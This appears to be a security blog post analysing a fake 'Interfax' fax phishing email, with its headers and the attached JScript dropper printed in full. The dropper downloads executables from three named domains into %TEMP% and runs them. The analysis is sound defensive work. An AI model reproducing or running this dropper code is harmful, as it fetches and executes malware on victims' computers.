Today Sebastian opened his mailbox and saw a new email popping up. You have received fax, document 00311594 from incoming@interfax.net with a file attached. Let’s have a closer look at it :)
First of all, here’s an screenshot of the email:
Let’s go on and have a look at the headers:
12345678910111213141516171819202122
Received: from unknown (HELO br184.hostgator.com.br) (192.185.176.27)
[..]
From: "Interfax" <incoming@interfax.net>
Reply-To: "Interfax" <incoming@interfax.net>
[..]
X-PHP-Script: www.temnoboqueirao.com.br/post.php for 213.198.53.247
[..]
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - br184.hostgator.com.br
X-AntiAbuse: Original Domain - internetwache.org
X-AntiAbuse: Originator/Caller UID/GID - [30210 500] / [47 12]
X-AntiAbuse: Sender Address Domain - br184.hostgator.com.br
X-BWhitelist: no
X-Source-IP:
X-Exim-ID: 1Zskih-0002l3-D7
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/temno589/public_html/post.php
X-Source-Dir: temnoboqueirao.com.br:/public_html
X-Source-Sender:
X-Source-Auth: temno589
X-Email-Count: 259
X-Source-Cap: dGVtbm81ODk7dGVtbm81ODk7YnIxODQuaG9zdGdhdG9yLmNvbS5icg==
We’ve notified hostgator about this probably compromised hosting account. Someone seems to use a simple PHP-script to distribute spam. Interestingly, interfax.net has a SPF record, so we’re wondering why this email had not been rejected by our hoster.
var b = "j-hsu.com kennedy.sitoserver.com arivusampark.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"499925";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n=1; n<=3; n++) {
for (var i=ld; i<b.length; i++) {
var dn = 0;
try {
xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=339019"+n, false);
xo.send();
if (xo.status == 200) {
xa.open();
xa.type = 1;
xa.write(xo.responseBody);
if (xa.size > 1000) {
dn = 1;
xa.position = 0;
xa.saveToFile(fn+n+".exe",2);
try {
ws.Run(fn+n+".exe",1,0);
} catch (er) { };
};
xa.close();
};
if (dn == 1) {
ld = i;
break;
};
} catch (er) { };
};
};
Wscript is an object which provides access to the window script host. With that, the script creates a WshShell object which can be used to run programs locally. It’s already obvious where this is going…. It tries to downlaod three different files (rnd=: 3390191, 3390192, 3390193) from the following urls, executing them afterwards:
$> du -sb drop.exe.rev.*
234018 drop.exe.rev.1
235008 drop.exe.rev.2
467456 drop.exe.rev.3
We’re both not into reverse engineering, so we decided to upload the files to virustotal.com. Most AVs do not detect the files as malicious (date: 1st of November 2015):
We’ve also submitted one sample to Anubis and Malwr.com, but it takes ages for them to analyse it.
That’s all about it. Nothing special, but Sebastian was just curious about it. However, it’s interesting and new to us that Windows seems to directly execute javascript (.js) files.
